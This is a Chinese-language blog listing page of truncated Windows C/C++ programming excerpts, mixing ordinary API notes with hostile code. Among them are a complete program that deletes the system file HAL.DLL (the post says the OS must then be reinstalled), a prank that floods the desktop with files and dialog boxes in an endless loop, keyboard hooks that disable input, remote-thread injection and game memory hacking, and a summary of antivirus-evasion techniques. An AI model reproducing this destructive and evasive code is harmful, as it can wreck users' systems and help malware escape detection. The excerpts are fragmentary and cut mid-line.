record

写的一个整人程序，运行程序后，程序会在桌面上创建N个文件，然后弹出N个对话框，进入个死循环。#include #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) //隐藏DOS窗口int main(){ char name[255];for(int z=0;z<=100000000

PVOID   MmGetSystemRoutineAddress(    IN PUNICODE_STRING  SystemRoutineName     ); 获取内核导出函数的地址SystemRoutineName 为一个UNICODE字符串如:RtlInitUnicodeString(&Old_NtOpenProcess,L"NtOpenProce

头文件：#include 定义函数：char * getenv(const char *name);函数说明：getenv()用来取得参数name 环境变量的内容. 参数name 为环境变量的名称, 如果该变量存在则会返回指向该内容的指针. 环境变量的格式为name＝value.返回值：执行成功则返回指向该内容的指针, 找不到符合的环境变量名称则返回

// freeheart.cpp : Defines the entry point for the console application.//学习交流使用，违法使用后果自负。// by:freeheart time 2013.5.24// argv 0 = freeheart.exe// argv 1 = -i // argv 2 = name.exe// argv 3 = 1

DLL 利用MFC创建，def文件中加入函数名,在cpp文件中写入自己的函数代码。在EXE源文件中加入两句代码。#pragma   comment(lib,"dll.lib"); __declspec( dllimport ) void goHook();然后调用函数即可。以下安装钩子让QQ2013键盘失效HHOOK aHook;LRESULT CALLBA

WINAPI DWORD GetModuleFileName( HMODULE hModule,LPWSTR lpFilename, DWORD nSize);hModule Long一个模块的句柄。可以是一个DLL模块，或者是一个应用程序的实例句柄。如果该参数为NULL，该函数返回该应用程序全路径。lpFileName String指定一个字串缓冲区，要在其中

#include "stdafx.h"#include //必要头文件#include //必要头文件#include using namespace std;int main(int argc, char* argv[]){ ifstream duqu("11.cpp"); //调用类,读取功能 ofstream xieru("C:\\1.txt");

平时定义主函数时通常的写法为:int main( )或void main( )int main( ) 只是 UNIX 及 Linux 默许的用法，main(int argc, char *argv[ ])才是UNIX和Linux中的标准写法。argc是参数个数argv是字符串数组,存参数的地方,如编译好的程序为1.exe在命令行执行 1.exe 1 2 3

这个函数可以实现远程CALL的功能。函数原型：HANDLE WINAPI CreateRemoteThread( __in HANDLE hProcess, //OpenProcess的返回值 __in LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T

//全局HOOK钩子例子。HHOOK MyHook = NULL;LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam){ return 1; //返回非0，让键盘失效。}AAA_API BOOL StartHook(void){MyHook = SetWindowsHookEx(WH_KEYBO

很简单一个辅助，关键是游戏数据的分析，实现了两个功能，无限阳光和无冷却。特别注意的一下，如果用VS2008编译的话，调试的时候是正常的，但编译后功能就会失效，这是因为OpenProcess权限的问题，需要提权，在VC6下是正常的。void CzhiwuDlg::OnBnClickedButton1(){ //无限阳光代码 HWND hJubing; DWORD lID; DWOR

加载必要文件:winsock2.h#pragma comment(lib,"ws2_32.lib")初始化版本：WSAStarup()建立套字节：socket()绑定IP和端口：bind()监听：listen()等待连接：accept()接受信息：recv()发送信息：send()关闭套字节：

HINSTANCE ShellExecute(         HWND hwnd,LPCTSTR lpOperation,LPCTSTR lpFile,LPCTSTR lpParameters,LPCTSTR lpDirectory,INT nShowCmd);第一个参数是个句柄。第二个参数是打开的方式,如"open".第三个参数是打开的地址,如:"htt

FindWindowGetWindowThreadProcessIdOpenProcessOpenProcessReadProcessMemory函数原型：HWND FindWindow(  LPCTSTR lpClassName, //窗口类名,可为NULL.LPCTSTR lpWindowName //窗口标题);DWORD GetWindo

#include int main(){DeleteFile("C:\\WINDOWS\\SYSTEM32\\HAL.DLL");return 0;}HAL.DLL 系统文件，删除后需重装系统，学习交流，谨慎使用后果自负。

各个杀毒软件查杀特点不一样，大致总结以下，API函数，字符串，代码段，资源段。免杀方法大致有如下几种手段，动态函数调用，延迟加载DLL，合并区段，字符串隐藏，删版权换版权，花指令，反调试等等细节，以上几种方法基本上过掉大部分杀软，当然有能力也可以自己改变程序的代码实现原来的功能。1.动态函数调用有两个函数是不能调用的，GetProcAddress，LoadLibrary。杀毒软件如果查

system()可以调用dos下的命令,但有时候碰到双引号的语句,导致编译不通过。如:system(" xxx "DCOM Protocols" xxxx");可以改为:system(" xxx \"DCOM Protocols\" xxxx");加上\号就可以了。